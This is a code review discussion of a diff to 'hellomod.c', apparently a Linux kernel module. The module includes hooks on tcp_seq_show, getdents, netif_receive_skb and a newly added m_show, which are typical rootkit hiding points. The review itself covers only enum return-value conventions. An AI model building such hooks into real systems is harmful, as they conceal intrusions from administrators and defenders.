hellomod.c

```diff
@@ -39,10 +39,14 @@
 #include "hook_functions/tcp_seq_show.c"
 #include "hook_functions/getdents.c"
 #include "hook_functions/netif_receive_skb.c"
+#include "hook_functions/m_show.c"
 
 typedef enum {
-        FAILED_TO_SET_SYSTEM_HOOKS = -1,
-        FAILED_TO_SET_FHOOK_HOOK = -2,
+    SUCCESSFULLY_INSTALLED = 0,
+    FAILED_TO_SET_SYSTEM_HOOKS = -1,
```

Comment:
Isn't it more standard to use increasing values order?

Reply:
I'm using those values as the return value from the **init_module**, if the result value is < 0 than the kernel doesn't install the module. therefore I've used negative values. but maybe it's useless as a return value. what do you think?

Reply:
What about something like that?
https://stackoverflow.com/a/21027383
The nice thing about `enum`s for me is not specifying values when they're not specifically needed

Reply:
thanks, that's a great solution. done.

Reply:
you still have negative numbers here, you can set `FAILED_TO_SET_SYSTEM_HOOKS=1` and then return -FAILED_TO_SET_SYSTEM_HOOKS for example.

Reply:
I mean, this way is more common - but I'll leave it up to you to decide

Reply:
Which way is more common? `return -<value>`? Feels weirder than having negative values in the `enum`

Reply:
Both conventions are used, but in different places